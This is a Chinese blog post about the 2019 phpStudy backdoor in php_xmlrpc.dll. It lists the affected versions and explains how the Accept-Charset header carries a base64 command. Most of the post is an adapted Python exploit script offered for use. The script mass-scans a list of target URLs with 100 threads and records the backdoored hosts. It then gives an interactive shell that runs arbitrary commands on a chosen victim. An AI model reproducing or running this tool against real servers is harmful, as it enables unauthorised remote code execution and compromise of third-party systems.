phpstudy后门
首页 > 工具    作者:Iamyc   2019年9月25日 10:29 星期三   热度:329°   百度已收录  
时间:2019-9-25 10:29   热度:329° 

这几天phpstudy的后门事件闹的沸沸扬扬,各种poc、exp到处飞。

今天也抽个时间看了下,土司上也有专门的后门分析,主要影响版本:

phpstudy 2016

php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
phpstudy 2018
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
然后打开了我本地平时做代码审计的phpstudy,切换下版本(现在大部分开源cms要求php7或者php5.6以上)


首先切换到5.4.45,burp抓下包:



代码执行,实锤了……

换到5.2.17也能代码执行。

复现时数据包主要注意点在于:

1、Accept-charset:****(该字段base64加密)

2、Accept-Encoding: gzip,deflate(数据包默认deflate前有个空格,需要删掉)

好了,各种exp到处飞,我也发一个,改了下别人的,最近也准备写个自己平时用的工具了。



#!/usr/bin/env python3
#-*- encoding:utf-8 -*-
# YC:http://www.lang-v.com

import base64
import requests
import json
import re
import time
import sys
import os
import time
import ctypes
import Queue
import threading

all = Queue.Queue()
lock = threading.RLock()






def logo():
    log = """
    '*'        '*'    '*'*''*'
     '*'      '*'    *'*'
      '*'    '*'    *'*'
        '*' '*'     '*'
          '*'       '*'
          '*'       '*'
          '*'       *'*'
          '*'        *'*'
          '*'         '*'*''*'
    \n
    by yc:www.lang-v.com
    """
    print log


def write_shell():
    while not all.empty():
        url = all.get()
        url = url+"/index.php"
        print "Tring "+url
        headers = {
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'accept-charset':'ZWNobyAid2RuZ2ZAISN5Yy4uIjs=',
        'Accept-Encoding': 'gzip,deflate',
        'Connection': 'keep-alive',
    }
        try:
            r = requests.get(url=url,headers=headers,timeout=10)
            r.close()
            if "wdngf@!#yc.." in r.text:
                print "[+] "+url
                with lock:
                    try:    
                        fxx = open('success.txt','a')
                        try:
                            fxx.write(str(url)+"\n")
                        finally:
                            fxx.close()
                    except:
                        pass
            else:
                pass

        except:
            pass


def header_by_command(command):
    new_header = {
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'accept-charset':str(base64.b64encode(command.encode('utf-8'),'utf-8')),
        'Accept-Encoding': 'gzip,deflate',
        'Connection': 'keep-alive',
    }
    return new_header

# url = "http://xxx"
# write_shell(url=url,headers=headers)

def main():
    fp = open('res.txt','r')
    lists = fp.readlines()
    for url in lists:
        url = url.replace("\n","")
        url = url.replace("\r\n","")
        if "http" not in url:
            url = "http://"+url
        all.put(url)

    print "Reading over"
    for x in range(100):
        t1 = threading.Thread(target=write_shell,args=())
        t1.start()
        t1.join()

def shell():
    print "shell mod\n"
    try:
        fpp = open('success.txt','r')
        shell_raw = fpp.readlines()
        #print shell_raw
        j = 1
        for i in shell_raw:
            print "[+] "+str(j)+" "+i
            j = j+1
        fpp.close()
        print "Input shell num and command:\n"
        while True:
            
            num_str = raw_input("Number:->")
            num = int(num_str)
            command = raw_input("command:->")
            command = command+"echo \"yc!@#\";"
            new_header = header_by_command(command)
            shell_need = shell_raw[num-1].replace("\n","")
            #print new_header
            #print shell_raw[num-1]
            try:
                htmlshell = requests.get(url=shell_need,headers=new_header,timeout=10)
                #print htmlshell.content[0:200]
                res = re.findall('(.*?)yc!@#',htmlshell.content)
                print res[0]
            except:
                pass


    except:
        pass


if __name__=='__main__':
    logo()
    main()
    shell()



运行效果:




二维码加载中...
本文作者:Iamyc      文章标题: phpstudy后门
本文地址:http://lang-v.com/first_cms/yc/emlog/src/?post=109
版权声明:若无注明,本文皆为“YC's Blog”原创,转载请保留文章出处。

返回顶部    首页    手机版本    后花园  
版权所有:YC's Blog    站长: Iamyc    程序:emlog